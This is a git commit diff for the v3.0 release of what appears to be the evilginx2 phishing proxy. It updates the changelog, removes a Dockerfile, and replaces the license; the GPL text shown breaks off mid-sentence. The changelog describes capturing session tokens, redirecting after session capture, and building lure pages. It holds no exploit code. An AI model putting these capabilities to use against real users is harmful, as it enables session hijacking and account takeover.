v3.0 release
This commit is contained in:
parent
511860ca99
commit
1ac3d10271
5
.gitignore
vendored
5
.gitignore
vendored
@ -1,6 +1,3 @@
|
||||
bin/
|
||||
docs/
|
||||
img/
|
||||
release/
|
||||
build/
|
||||
phishlets/test-*
|
||||
private/
|
||||
|
36
CHANGELOG
36
CHANGELOG
@ -1,4 +1,26 @@
|
||||
2.4.0
|
||||
# 3.0.0
|
||||
- Feature: TLS certificates from LetsEncrypt will now get automatically renewed.
|
||||
- Feature: Automated retrieval and renewal of LetsEncrypt TLS certificates is now managed by `certmagic` library.
|
||||
- Feature: Authentication tokens can now be captured not only from cookies, but also from response body and HTTP headers.
|
||||
- Feature: Phishing pages can now be embedded inside of iframes.
|
||||
- Feature: Changed redirection after successful session capture from `Location` header redirection to injected Javascript redirection.
|
||||
- Feature: Changed config file from `config.yaml` to `config.json`, permanently changing the configuration format to JSON.
|
||||
- Feature: Changed open-source license from GPL to BSD-3.
|
||||
- Feature: Added `always` modifier for capturing authentication cookies, forcing to capture a cookie even if it has no expiration time.
|
||||
- Feature: Added `phishlet <phishlet>` command to show details of a specific phishlet.
|
||||
- Feature: Added phishlet templates, allowing to create child phishlets with custom parameters like pre-configured subdomain or domain. Parameters can be defined anywhere in the phishlet file as `{param_name}` and every occurence will be replaced with pre-configured parameter values of the created child phishlet.
|
||||
- Feature: Added `phishlet create` command to create child phishlets from template phishlets.
|
||||
- Feature: Renamed lure `templates` to lure `redirectors` due to name conflict with phishlet templates.
|
||||
- Feature: Added `{orig_hostname}` and `{orig_domain}` support for `sub_filters` phishlet setting.
|
||||
- Feature: Added `{basedomain}` and `{basedomain_regexp}` support for `sub_filters` phishlet setting.
|
||||
- Fixed: One target can now have multiple phishing sessions active for several different phishlets.
|
||||
- Fixed: Cookie capture from HTTP packet response will not stop mid-term, ignoring missing `opt` cookies, when all authentication cookies are already captured.
|
||||
- Fixed: `trigger_paths` regexp will now match a full string instead of triggering true when just part of it is detected in URL path.
|
||||
- Fixed: Phishlet table rows are now sorted alphabetically.
|
||||
- Fixed: Improved phishing session management to always create a new session when lure URL is hit if session cookie is not present, even when IP whitelist is set.
|
||||
- Fixed: WebSocket connections are now properly proxied.
|
||||
|
||||
# 2.4.0
|
||||
- Feature: Create and set up pre-phish HTML templates for your campaigns. Create your HTML file and place `{lure_url_html}` or `{lure_url_js}` in code to manage redirection to the phishing page with any form of user interaction. Command: `lures edit <id> template <template>`
|
||||
- Feature: Create customized hostnames for every phishing lure. Command: `lures edit <id> hostname <hostname>`.
|
||||
- Feature: Support for routing connection via SOCKS5 and HTTP(S) proxies. Command: `proxy`.
|
||||
@ -14,19 +36,19 @@
|
||||
- Improved autofill for `lures edit` commands and switched positions of `<id>` and the variable name.
|
||||
- Increased the duration of whitelisting authorized connections for whole IP address from 15 seconds to 10 minutes.
|
||||
|
||||
2.3.3
|
||||
# 2.3.3
|
||||
- Fixed: Multiple concurrent map writes when whitelisting IPs during heavy loads.
|
||||
|
||||
2.3.2
|
||||
# 2.3.2
|
||||
- ACMEv2 support added to comply with LetsEncrypt requirements.
|
||||
- Fixed session cookie output to support EditThisCookie on the latest Chrome version.
|
||||
- Increased timeouts for proxying HTTP packets to 45 seconds.
|
||||
- Added support for Go modules.
|
||||
|
||||
2.3.1
|
||||
# 2.3.1
|
||||
- Redirection is now triggered only for responses with `text/html` content-type header.
|
||||
|
||||
2.3.0
|
||||
# 2.3.0
|
||||
- Proxy can now create most of required `sub_filters` on its own, making it much easier to create new phishlets.
|
||||
- Added lures, with which you can prepare custom phishing URLs with each having its own set of unique options (`help lures` for more info).
|
||||
- Added OpenGraph settings for lures, allowing to create enticing content for link previews.
|
||||
@ -34,10 +56,10 @@
|
||||
- Injected Javascript can be customized with values of custom parameters, specified in lure options.
|
||||
- Deprecated `landing_path` and replaced it with `login` section, which contains the domain and path for website's login page.
|
||||
|
||||
2.2.1
|
||||
# 2.2.1
|
||||
- Fixed: `type` with value `json` was not correctly activated when set under `credentials`.
|
||||
|
||||
2.2.0
|
||||
# 2.2.0
|
||||
- Now when any of `auth_urls` is triggered, the redirection will take place AFTER response cookies for that request are captured.
|
||||
- Regular expression groups working with `sub_filters`.
|
||||
- Phishlets are now listed in a table.
|
||||
|
36
Dockerfile
36
Dockerfile
@ -1,36 +0,0 @@
|
||||
FROM golang:1.13.1-alpine as build
|
||||
|
||||
RUN apk add --update \
|
||||
git \
|
||||
&& rm -rf /var/cache/apk/*
|
||||
|
||||
RUN wget -O /usr/local/bin/dep https://github.com/golang/dep/releases/download/v0.5.0/dep-linux-amd64 && chmod +x /usr/local/bin/dep
|
||||
|
||||
WORKDIR /go/src/github.com/kgretzky/evilginx2
|
||||
|
||||
COPY go.mod go.sum ./
|
||||
|
||||
ENV GO111MODULE on
|
||||
|
||||
RUN go mod download
|
||||
|
||||
COPY . /go/src/github.com/kgretzky/evilginx2
|
||||
|
||||
RUN go build -o ./bin/evilginx main.go
|
||||
|
||||
FROM alpine:3.8
|
||||
|
||||
RUN apk add --update \
|
||||
ca-certificates \
|
||||
&& rm -rf /var/cache/apk/*
|
||||
|
||||
WORKDIR /app
|
||||
|
||||
COPY --from=build /go/src/github.com/kgretzky/evilginx2/bin/evilginx /app/evilginx
|
||||
COPY ./phishlets/*.yaml /app/phishlets/
|
||||
|
||||
VOLUME ["/app/phishlets/"]
|
||||
|
||||
EXPOSE 443 80 53/udp
|
||||
|
||||
ENTRYPOINT ["/app/evilginx"]
|
622
LICENSE
622
LICENSE
@ -1,595 +1,27 @@
|
||||
GNU General Public License
|
||||
==========================
|
||||
|
||||
_Version 3, 29 June 2007_
|
||||
_Copyright © 2007 Free Software Foundation, Inc. <<http://fsf.org/>>_
|
||||
|
||||
Everyone is permitted to copy and distribute verbatim copies of this license
|
||||
document, but changing it is not allowed.
|
||||
|
||||
## Preamble
|
||||
|
||||
The GNU General Public License is a free, copyleft license for software and other
|
||||
kinds of works.
|
||||
|
||||
The licenses for most software and other practical works are designed to take away
|
||||
your freedom to share and change the works. By contrast, the GNU General Public
|
||||
License is intended to guarantee your freedom to share and change all versions of a
|
||||
program--to make sure it remains free software for all its users. We, the Free
|
||||
Software Foundation, use the GNU General Public License for most of our software; it
|
||||
applies also to any other work released this way by its authors. You can apply it to
|
||||
your programs, too.
|
||||
|
||||
When we speak of free software, we are referring to freedom, not price. Our General
|
||||
Public Licenses are designed to make sure that you have the freedom to distribute
|
||||
copies of free software (and charge for them if you wish), that you receive source
|
||||
code or can get it if you want it, that you can change the software or use pieces of
|
||||
it in new free programs, and that you know you can do these things.
|
||||
|
||||
To protect your rights, we need to prevent others from denying you these rights or
|
||||
asking you to surrender the rights. Therefore, you have certain responsibilities if
|
||||
you distribute copies of the software, or if you modify it: responsibilities to
|
||||
respect the freedom of others.
|
||||
|
||||
For example, if you distribute copies of such a program, whether gratis or for a fee,
|
||||
you must pass on to the recipients the same freedoms that you received. You must make
|
||||
sure that they, too, receive or can get the source code. And you must show them these
|
||||
terms so they know their rights.
|
||||
|
||||
Developers that use the GNU GPL protect your rights with two steps: **(1)** assert
|
||||
copyright on the software, and **(2)** offer you this License giving you legal permission
|
||||
to copy, distribute and/or modify it.
|
||||
|
||||
For the developers' and authors' protection, the GPL clearly explains that there is
|
||||
no warranty for this free software. For both users' and authors' sake, the GPL
|
||||
requires that modified versions be marked as changed, so that their problems will not
|
||||
be attributed erroneously to authors of previous versions.
|
||||
|
||||
Some devices are designed to deny users access to install or run modified versions of
|
||||
the software inside them, although the manufacturer can do so. This is fundamentally
|
||||
incompatible with the aim of protecting users' freedom to change the software. The
|
||||
systematic pattern of such abuse occurs in the area of products for individuals to
|
||||
use, which is precisely where it is most unacceptable. Therefore, we have designed
|
||||
this version of the GPL to prohibit the practice for those products. If such problems
|
||||
arise substantially in other domains, we stand ready to extend this provision to
|
||||
those domains in future versions of the GPL, as needed to protect the freedom of
|
||||
users.
|
||||
|
||||
Finally, every program is threatened constantly by software patents. States should
|
||||
not allow patents to restrict development and use of software on general-purpose
|
||||
computers, but in those that do, we wish to avoid the special danger that patents
|
||||
applied to a free program could make it effectively proprietary. To prevent this, the
|
||||
GPL assures that patents cannot be used to render the program non-free.
|
||||
|
||||
The precise terms and conditions for copying, distribution and modification follow.
|
||||
|
||||
## TERMS AND CONDITIONS
|
||||
|
||||
### 0. Definitions
|
||||
|
||||
“This License” refers to version 3 of the GNU General Public License.
|
||||
|
||||
“Copyright” also means copyright-like laws that apply to other kinds of
|
||||
works, such as semiconductor masks.
|
||||
|
||||
“The Program” refers to any copyrightable work licensed under this
|
||||
License. Each licensee is addressed as “you”. “Licensees” and
|
||||
“recipients” may be individuals or organizations.
|
||||
|
||||
To “modify” a work means to copy from or adapt all or part of the work in
|
||||
a fashion requiring copyright permission, other than the making of an exact copy. The
|
||||
resulting work is called a “modified version” of the earlier work or a
|
||||
work “based on” the earlier work.
|
||||
|
||||
A “covered work” means either the unmodified Program or a work based on
|
||||
the Program.
|
||||
|
||||
To “propagate” a work means to do anything with it that, without
|
||||
permission, would make you directly or secondarily liable for infringement under
|
||||
applicable copyright law, except executing it on a computer or modifying a private
|
||||
copy. Propagation includes copying, distribution (with or without modification),
|
||||
making available to the public, and in some countries other activities as well.
|
||||
|
||||
To “convey” a work means any kind of propagation that enables other
|
||||
parties to make or receive copies. Mere interaction with a user through a computer
|
||||
network, with no transfer of a copy, is not conveying.
|
||||
|
||||
An interactive user interface displays “Appropriate Legal Notices” to the
|
||||
extent that it includes a convenient and prominently visible feature that **(1)**
|
||||
displays an appropriate copyright notice, and **(2)** tells the user that there is no
|
||||
warranty for the work (except to the extent that warranties are provided), that
|
||||
licensees may convey the work under this License, and how to view a copy of this
|
||||
License. If the interface presents a list of user commands or options, such as a
|
||||
menu, a prominent item in the list meets this criterion.
|
||||
|
||||
### 1. Source Code
|
||||
|
||||
The “source code” for a work means the preferred form of the work for
|
||||
making modifications to it. “Object code” means any non-source form of a
|
||||
work.
|
||||
|
||||
A “Standard Interface” means an interface that either is an official
|
||||
standard defined by a recognized standards body, or, in the case of interfaces
|
||||
specified for a particular programming language, one that is widely used among
|
||||
developers working in that language.
|
||||
|
||||
The “System Libraries” of an executable work include anything, other than
|
||||
the work as a whole, that **(a)** is included in the normal form of packaging a Major
|
||||
Component, but which is not part of that Major Component, and **(b)** serves only to
|
||||
enable use of the work with that Major Component, or to implement a Standard
|
||||
Interface for which an implementation is available to the public in source code form.
|
||||
A “Major Component”, in this context, means a major essential component
|
||||
(kernel, window system, and so on) of the specific operating system (if any) on which
|
||||
the executable work runs, or a compiler used to produce the work, or an object code
|
||||
interpreter used to run it.
|
||||
|
||||
The “Corresponding Source” for a work in object code form means all the
|
||||
source code needed to generate, install, and (for an executable work) run the object
|
||||
code and to modify the work, including scripts to control those activities. However,
|
||||
it does not include the work's System Libraries, or general-purpose tools or
|
||||
generally available free programs which are used unmodified in performing those
|
||||
activities but which are not part of the work. For example, Corresponding Source
|
||||
includes interface definition files associated with source files for the work, and
|
||||
the source code for shared libraries and dynamically linked subprograms that the work
|
||||
is specifically designed to require, such as by intimate data communication or
|
||||
control flow between those subprograms and other parts of the work.
|
||||
|
||||
The Corresponding Source need not include anything that users can regenerate
|
||||
automatically from other parts of the Corresponding Source.
|
||||
|
||||
The Corresponding Source for a work in source code form is that same work.
|
||||
|
||||
### 2. Basic Permissions
|
||||
|
||||
All rights granted under this License are granted for the term of copyright on the
|
||||
Program, and are irrevocable provided the stated conditions are met. This License
|
||||
explicitly affirms your unlimited permission to run the unmodified Program. The
|
||||
output from running a covered work is covered by this License only if the output,
|
||||
given its content, constitutes a covered work. This License acknowledges your rights
|
||||
of fair use or other equivalent, as provided by copyright law.
|
||||
|
||||
You may make, run and propagate covered works that you do not convey, without
|
||||
conditions so long as your license otherwise remains in force. You may convey covered
|
||||
works to others for the sole purpose of having them make modifications exclusively
|
||||
for you, or provide you with facilities for running those works, provided that you
|
||||
comply with the terms of this License in conveying all material for which you do not
|
||||
control copyright. Those thus making or running the covered works for you must do so
|
||||
exclusively on your behalf, under your direction and control, on terms that prohibit
|
||||
them from making any copies of your copyrighted material outside their relationship
|
||||
with you.
|
||||
|
||||
Conveying under any other circumstances is permitted solely under the conditions
|
||||
stated below. Sublicensing is not allowed; section 10 makes it unnecessary.
|
||||
|
||||
### 3. Protecting Users' Legal Rights From Anti-Circumvention Law
|
||||
|
||||
No covered work shall be deemed part of an effective technological measure under any
|
||||
applicable law fulfilling obligations under article 11 of the WIPO copyright treaty
|
||||
adopted on 20 December 1996, or similar laws prohibiting or restricting circumvention
|
||||
of such measures.
|
||||
|
||||
When you convey a covered work, you waive any legal power to forbid circumvention of
|
||||
technological measures to the extent such circumvention is effected by exercising
|
||||
rights under this License with respect to the covered work, and you disclaim any
|
||||
intention to limit operation or modification of the work as a means of enforcing,
|
||||
against the work's users, your or third parties' legal rights to forbid circumvention
|
||||
of technological measures.
|
||||
|
||||
### 4. Conveying Verbatim Copies
|
||||
|
||||
You may convey verbatim copies of the Program's source code as you receive it, in any
|
||||
medium, provided that you conspicuously and appropriately publish on each copy an
|
||||
appropriate copyright notice; keep intact all notices stating that this License and
|
||||
any non-permissive terms added in accord with section 7 apply to the code; keep
|
||||
intact all notices of the absence of any warranty; and give all recipients a copy of
|
||||
this License along with the Program.
|
||||
|
||||
You may charge any price or no price for each copy that you convey, and you may offer
|
||||
support or warranty protection for a fee.
|
||||
|
||||
### 5. Conveying Modified Source Versions
|
||||
|
||||
You may convey a work based on the Program, or the modifications to produce it from
|
||||
the Program, in the form of source code under the terms of section 4, provided that
|
||||
you also meet all of these conditions:
|
||||
|
||||
* **a)** The work must carry prominent notices stating that you modified it, and giving a
|
||||
relevant date.
|
||||
* **b)** The work must carry prominent notices stating that it is released under this
|
||||
License and any conditions added under section 7. This requirement modifies the
|
||||
requirement in section 4 to “keep intact all notices”.
|
||||
* **c)** You must license the entire work, as a whole, under this License to anyone who
|
||||
comes into possession of a copy. This License will therefore apply, along with any
|
||||
applicable section 7 additional terms, to the whole of the work, and all its parts,
|
||||
regardless of how they are packaged. This License gives no permission to license the
|
||||
work in any other way, but it does not invalidate such permission if you have
|
||||
separately received it.
|
||||
* **d)** If the work has interactive user interfaces, each must display Appropriate Legal
|
||||
Notices; however, if the Program has interactive interfaces that do not display
|
||||
Appropriate Legal Notices, your work need not make them do so.
|
||||
|
||||
A compilation of a covered work with other separate and independent works, which are
|
||||
not by their nature extensions of the covered work, and which are not combined with
|
||||
it such as to form a larger program, in or on a volume of a storage or distribution
|
||||
medium, is called an “aggregate” if the compilation and its resulting
|
||||
copyright are not used to limit the access or legal rights of the compilation's users
|
||||
beyond what the individual works permit. Inclusion of a covered work in an aggregate
|
||||
does not cause this License to apply to the other parts of the aggregate.
|
||||
|
||||
### 6. Conveying Non-Source Forms
|
||||
|
||||
You may convey a covered work in object code form under the terms of sections 4 and
|
||||
5, provided that you also convey the machine-readable Corresponding Source under the
|
||||
terms of this License, in one of these ways:
|
||||
|
||||
* **a)** Convey the object code in, or embodied in, a physical product (including a
|
||||
physical distribution medium), accompanied by the Corresponding Source fixed on a
|
||||
durable physical medium customarily used for software interchange.
|
||||
* **b)** Convey the object code in, or embodied in, a physical product (including a
|
||||
physical distribution medium), accompanied by a written offer, valid for at least
|
||||
three years and valid for as long as you offer spare parts or customer support for
|
||||
that product model, to give anyone who possesses the object code either **(1)** a copy of
|
||||
the Corresponding Source for all the software in the product that is covered by this
|
||||
License, on a durable physical medium customarily used for software interchange, for
|
||||
a price no more than your reasonable cost of physically performing this conveying of
|
||||
source, or **(2)** access to copy the Corresponding Source from a network server at no
|
||||
charge.
|
||||
* **c)** Convey individual copies of the object code with a copy of the written offer to
|
||||
provide the Corresponding Source. This alternative is allowed only occasionally and
|
||||
noncommercially, and only if you received the object code with such an offer, in
|
||||
accord with subsection 6b.
|
||||
* **d)** Convey the object code by offering access from a designated place (gratis or for
|
||||
a charge), and offer equivalent access to the Corresponding Source in the same way
|
||||
through the same place at no further charge. You need not require recipients to copy
|
||||
the Corresponding Source along with the object code. If the place to copy the object
|
||||
code is a network server, the Corresponding Source may be on a different server
|
||||
(operated by you or a third party) that supports equivalent copying facilities,
|
||||
provided you maintain clear directions next to the object code saying where to find
|
||||
the Corresponding Source. Regardless of what server hosts the Corresponding Source,
|
||||
you remain obligated to ensure that it is available for as long as needed to satisfy
|
||||
these requirements.
|
||||
* **e)** Convey the object code using peer-to-peer transmission, provided you inform
|
||||
other peers where the object code and Corresponding Source of the work are being
|
||||
offered to the general public at no charge under subsection 6d.
|
||||
|
||||
A separable portion of the object code, whose source code is excluded from the
|
||||
Corresponding Source as a System Library, need not be included in conveying the
|
||||
object code work.
|
||||
|
||||
A “User Product” is either **(1)** a “consumer product”, which
|
||||
means any tangible personal property which is normally used for personal, family, or
|
||||
household purposes, or **(2)** anything designed or sold for incorporation into a
|
||||
dwelling. In determining whether a product is a consumer product, doubtful cases
|
||||
shall be resolved in favor of coverage. For a particular product received by a
|
||||
particular user, “normally used” refers to a typical or common use of
|
||||
that class of product, regardless of the status of the particular user or of the way
|
||||
in which the particular user actually uses, or expects or is expected to use, the
|
||||
product. A product is a consumer product regardless of whether the product has
|
||||
substantial commercial, industrial or non-consumer uses, unless such uses represent
|
||||
the only significant mode of use of the product.
|
||||
|
||||
“Installation Information” for a User Product means any methods,
|
||||
procedures, authorization keys, or other information required to install and execute
|
||||
modified versions of a covered work in that User Product from a modified version of
|
||||
its Corresponding Source. The information must suffice to ensure that the continued
|
||||
functioning of the modified object code is in no case prevented or interfered with
|
||||
solely because modification has been made.
|
||||
|
||||
If you convey an object code work under this section in, or with, or specifically for
|
||||
use in, a User Product, and the conveying occurs as part of a transaction in which
|
||||
the right of possession and use of the User Product is transferred to the recipient
|
||||
in perpetuity or for a fixed term (regardless of how the transaction is
|
||||
characterized), the Corresponding Source conveyed under this section must be
|
||||
accompanied by the Installation Information. But this requirement does not apply if
|
||||
neither you nor any third party retains the ability to install modified object code
|
||||
on the User Product (for example, the work has been installed in ROM).
|
||||
|
||||
The requirement to provide Installation Information does not include a requirement to
|
||||
continue to provide support service, warranty, or updates for a work that has been
|
||||
modified or installed by the recipient, or for the User Product in which it has been
|
||||
modified or installed. Access to a network may be denied when the modification itself
|
||||
materially and adversely affects the operation of the network or violates the rules
|
||||
and protocols for communication across the network.
|
||||
|
||||
Corresponding Source conveyed, and Installation Information provided, in accord with
|
||||
this section must be in a format that is publicly documented (and with an
|
||||
implementation available to the public in source code form), and must require no
|
||||
special password or key for unpacking, reading or copying.
|
||||
|
||||
### 7. Additional Terms
|
||||
|
||||
“Additional permissions” are terms that supplement the terms of this
|
||||
License by making exceptions from one or more of its conditions. Additional
|
||||
permissions that are applicable to the entire Program shall be treated as though they
|
||||
were included in this License, to the extent that they are valid under applicable
|
||||
law. If additional permissions apply only to part of the Program, that part may be
|
||||
used separately under those permissions, but the entire Program remains governed by
|
||||
this License without regard to the additional permissions.
|
||||
|
||||
When you convey a copy of a covered work, you may at your option remove any
|
||||
additional permissions from that copy, or from any part of it. (Additional
|
||||
permissions may be written to require their own removal in certain cases when you
|
||||
modify the work.) You may place additional permissions on material, added by you to a
|
||||
covered work, for which you have or can give appropriate copyright permission.
|
||||
|
||||
Notwithstanding any other provision of this License, for material you add to a
|
||||
covered work, you may (if authorized by the copyright holders of that material)
|
||||
supplement the terms of this License with terms:
|
||||
|
||||
* **a)** Disclaiming warranty or limiting liability differently from the terms of
|
||||
sections 15 and 16 of this License; or
|
||||
* **b)** Requiring preservation of specified reasonable legal notices or author
|
||||
attributions in that material or in the Appropriate Legal Notices displayed by works
|
||||
containing it; or
|
||||
* **c)** Prohibiting misrepresentation of the origin of that material, or requiring that
|
||||
modified versions of such material be marked in reasonable ways as different from the
|
||||
original version; or
|
||||
* **d)** Limiting the use for publicity purposes of names of licensors or authors of the
|
||||
material; or
|
||||
* **e)** Declining to grant rights under trademark law for use of some trade names,
|
||||
trademarks, or service marks; or
|
||||
* **f)** Requiring indemnification of licensors and authors of that material by anyone
|
||||
who conveys the material (or modified versions of it) with contractual assumptions of
|
||||
liability to the recipient, for any liability that these contractual assumptions
|
||||
directly impose on those licensors and authors.
|
||||
|
||||
All other non-permissive additional terms are considered “further
|
||||
restrictions” within the meaning of section 10. If the Program as you received
|
||||
it, or any part of it, contains a notice stating that it is governed by this License
|
||||
along with a term that is a further restriction, you may remove that term. If a
|
||||
license document contains a further restriction but permits relicensing or conveying
|
||||
under this License, you may add to a covered work material governed by the terms of
|
||||
that license document, provided that the further restriction does not survive such
|
||||
relicensing or conveying.
|
||||
|
||||
If you add terms to a covered work in accord with this section, you must place, in
|
||||
the relevant source files, a statement of the additional terms that apply to those
|
||||
files, or a notice indicating where to find the applicable terms.
|
||||
|
||||
Additional terms, permissive or non-permissive, may be stated in the form of a
|
||||
separately written license, or stated as exceptions; the above requirements apply
|
||||
either way.
|
||||
|
||||
### 8. Termination
|
||||
|
||||
You may not propagate or modify a covered work except as expressly provided under
|
||||
this License. Any attempt otherwise to propagate or modify it is void, and will
|
||||
automatically terminate your rights under this License (including any patent licenses
|
||||
granted under the third paragraph of section 11).
|
||||
|
||||
However, if you cease all violation of this License, then your license from a
|
||||
particular copyright holder is reinstated **(a)** provisionally, unless and until the
|
||||
copyright holder explicitly and finally terminates your license, and **(b)** permanently,
|
||||
if the copyright holder fails to notify you of the violation by some reasonable means
|
||||
prior to 60 days after the cessation.
|
||||
|
||||
Moreover, your license from a particular copyright holder is reinstated permanently
|
||||
if the copyright holder notifies you of the violation by some reasonable means, this
|
||||
is the first time you have received notice of violation of this License (for any
|
||||
work) from that copyright holder, and you cure the violation prior to 30 days after
|
||||
your receipt of the notice.
|
||||
|
||||
Termination of your rights under this section does not terminate the licenses of
|
||||
parties who have received copies or rights from you under this License. If your
|
||||
rights have been terminated and not permanently reinstated, you do not qualify to
|
||||
receive new licenses for the same material under section 10.
|
||||
|
||||
### 9. Acceptance Not Required for Having Copies
|
||||
|
||||
You are not required to accept this License in order to receive or run a copy of the
|
||||
Program. Ancillary propagation of a covered work occurring solely as a consequence of
|
||||
using peer-to-peer transmission to receive a copy likewise does not require
|
||||
acceptance. However, nothing other than this License grants you permission to
|
||||
propagate or modify any covered work. These actions infringe copyright if you do not
|
||||
accept this License. Therefore, by modifying or propagating a covered work, you
|
||||
indicate your acceptance of this License to do so.
|
||||
|
||||
### 10. Automatic Licensing of Downstream Recipients
|
||||
|
||||
Each time you convey a covered work, the recipient automatically receives a license
|
||||
from the original licensors, to run, modify and propagate that work, subject to this
|
||||
License. You are not responsible for enforcing compliance by third parties with this
|
||||
License.
|
||||
|
||||
An “entity transaction” is a transaction transferring control of an
|
||||
organization, or substantially all assets of one, or subdividing an organization, or
|
||||
merging organizations. If propagation of a covered work results from an entity
|
||||
transaction, each party to that transaction who receives a copy of the work also
|
||||
receives whatever licenses to the work the party's predecessor in interest had or
|
||||
could give under the previous paragraph, plus a right to possession of the
|
||||
Corresponding Source of the work from the predecessor in interest, if the predecessor
|
||||
has it or can get it with reasonable efforts.
|
||||
|
||||
You may not impose any further restrictions on the exercise of the rights granted or
|
||||
affirmed under this License. For example, you may not impose a license fee, royalty,
|
||||
or other charge for exercise of rights granted under this License, and you may not
|
||||
initiate litigation (including a cross-claim or counterclaim in a lawsuit) alleging
|
||||
that any patent claim is infringed by making, using, selling, offering for sale, or
|
||||
importing the Program or any portion of it.
|
||||
|
||||
### 11. Patents
|
||||
|
||||
A “contributor” is a copyright holder who authorizes use under this
|
||||
License of the Program or a work on which the Program is based. The work thus
|
||||
licensed is called the contributor's “contributor version”.
|
||||
|
||||
A contributor's “essential patent claims” are all patent claims owned or
|
||||
controlled by the contributor, whether already acquired or hereafter acquired, that
|
||||
would be infringed by some manner, permitted by this License, of making, using, or
|
||||
selling its contributor version, but do not include claims that would be infringed
|
||||
only as a consequence of further modification of the contributor version. For
|
||||
purposes of this definition, “control” includes the right to grant patent
|
||||
sublicenses in a manner consistent with the requirements of this License.
|
||||
|
||||
Each contributor grants you a non-exclusive, worldwide, royalty-free patent license
|
||||
under the contributor's essential patent claims, to make, use, sell, offer for sale,
|
||||
import and otherwise run, modify and propagate the contents of its contributor
|
||||
version.
|
||||
|
||||
In the following three paragraphs, a “patent license” is any express
|
||||
agreement or commitment, however denominated, not to enforce a patent (such as an
|
||||
express permission to practice a patent or covenant not to sue for patent
|
||||
infringement). To “grant” such a patent license to a party means to make
|
||||
such an agreement or commitment not to enforce a patent against the party.
|
||||
|
||||
If you convey a covered work, knowingly relying on a patent license, and the
|
||||
Corresponding Source of the work is not available for anyone to copy, free of charge
|
||||
and under the terms of this License, through a publicly available network server or
|
||||
other readily accessible means, then you must either **(1)** cause the Corresponding
|
||||
Source to be so available, or **(2)** arrange to deprive yourself of the benefit of the
|
||||
patent license for this particular work, or **(3)** arrange, in a manner consistent with
|
||||
the requirements of this License, to extend the patent license to downstream
|
||||
recipients. “Knowingly relying” means you have actual knowledge that, but
|
||||
for the patent license, your conveying the covered work in a country, or your
|
||||
recipient's use of the covered work in a country, would infringe one or more
|
||||
identifiable patents in that country that you have reason to believe are valid.
|
||||
|
||||
If, pursuant to or in connection with a single transaction or arrangement, you
|
||||
convey, or propagate by procuring conveyance of, a covered work, and grant a patent
|
||||
license to some of the parties receiving the covered work authorizing them to use,
|
||||
propagate, modify or convey a specific copy of the covered work, then the patent
|
||||
license you grant is automatically extended to all recipients of the covered work and
|
||||
works based on it.
|
||||
|
||||
A patent license is “discriminatory” if it does not include within the
|
||||
scope of its coverage, prohibits the exercise of, or is conditioned on the
|
||||
non-exercise of one or more of the rights that are specifically granted under this
|
||||
License. You may not convey a covered work if you are a party to an arrangement with
|
||||
a third party that is in the business of distributing software, under which you make
|
||||
payment to the third party based on the extent of your activity of conveying the
|
||||
work, and under which the third party grants, to any of the parties who would receive
|
||||
the covered work from you, a discriminatory patent license **(a)** in connection with
|
||||
copies of the covered work conveyed by you (or copies made from those copies), or **(b)**
|
||||
primarily for and in connection with specific products or compilations that contain
|
||||
the covered work, unless you entered into that arrangement, or that patent license
|
||||
was granted, prior to 28 March 2007.
|
||||
|
||||
Nothing in this License shall be construed as excluding or limiting any implied
|
||||
license or other defenses to infringement that may otherwise be available to you
|
||||
under applicable patent law.
|
||||
|
||||
### 12. No Surrender of Others' Freedom
|
||||
|
||||
If conditions are imposed on you (whether by court order, agreement or otherwise)
|
||||
that contradict the conditions of this License, they do not excuse you from the
|
||||
conditions of this License. If you cannot convey a covered work so as to satisfy
|
||||
simultaneously your obligations under this License and any other pertinent
|
||||
obligations, then as a consequence you may not convey it at all. For example, if you
|
||||
agree to terms that obligate you to collect a royalty for further conveying from
|
||||
those to whom you convey the Program, the only way you could satisfy both those terms
|
||||
and this License would be to refrain entirely from conveying the Program.
|
||||
|
||||
### 13. Use with the GNU Affero General Public License
|
||||
|
||||
Notwithstanding any other provision of this License, you have permission to link or
|
||||
combine any covered work with a work licensed under version 3 of the GNU Affero
|
||||
General Public License into a single combined work, and to convey the resulting work.
|
||||
The terms of this License will continue to apply to the part which is the covered
|
||||
work, but the special requirements of the GNU Affero General Public License, section
|
||||
13, concerning interaction through a network will apply to the combination as such.
|
||||
|
||||
### 14. Revised Versions of this License
|
||||
|
||||
The Free Software Foundation may publish revised and/or new versions of the GNU
|
||||
General Public License from time to time. Such new versions will be similar in spirit
|
||||
to the present version, but may differ in detail to address new problems or concerns.
|
||||
|
||||
Each version is given a distinguishing version number. If the Program specifies that
|
||||
a certain numbered version of the GNU General Public License “or any later
|
||||
version” applies to it, you have the option of following the terms and
|
||||
conditions either of that numbered version or of any later version published by the
|
||||
Free Software Foundation. If the Program does not specify a version number of the GNU
|
||||
General Public License, you may choose any version ever published by the Free
|
||||
Software Foundation.
|
||||
|
||||
If the Program specifies that a proxy can decide which future versions of the GNU
|
||||
General Public License can be used, that proxy's public statement of acceptance of a
|
||||
version permanently authorizes you to choose that version for the Program.
|
||||
|
||||
Later license versions may give you additional or different permissions. However, no
|
||||
additional obligations are imposed on any author or copyright holder as a result of
|
||||
your choosing to follow a later version.
|
||||
|
||||
### 15. Disclaimer of Warranty
|
||||
|
||||
THERE IS NO WARRANTY FOR THE PROGRAM, TO THE EXTENT PERMITTED BY APPLICABLE LAW.
|
||||
EXCEPT WHEN OTHERWISE STATED IN WRITING THE COPYRIGHT HOLDERS AND/OR OTHER PARTIES
|
||||
PROVIDE THE PROGRAM “AS IS” WITHOUT WARRANTY OF ANY KIND, EITHER
|
||||
EXPRESSED OR IMPLIED, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF
|
||||
MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE. THE ENTIRE RISK AS TO THE
|
||||
QUALITY AND PERFORMANCE OF THE PROGRAM IS WITH YOU. SHOULD THE PROGRAM PROVE
|
||||
DEFECTIVE, YOU ASSUME THE COST OF ALL NECESSARY SERVICING, REPAIR OR CORRECTION.
|
||||
|
||||
### 16. Limitation of Liability
|
||||
|
||||
IN NO EVENT UNLESS REQUIRED BY APPLICABLE LAW OR AGREED TO IN WRITING WILL ANY
|
||||
COPYRIGHT HOLDER, OR ANY OTHER PARTY WHO MODIFIES AND/OR CONVEYS THE PROGRAM AS
|
||||
PERMITTED ABOVE, BE LIABLE TO YOU FOR DAMAGES, INCLUDING ANY GENERAL, SPECIAL,
|
||||
INCIDENTAL OR CONSEQUENTIAL DAMAGES ARISING OUT OF THE USE OR INABILITY TO USE THE
|
||||
PROGRAM (INCLUDING BUT NOT LIMITED TO LOSS OF DATA OR DATA BEING RENDERED INACCURATE
|
||||
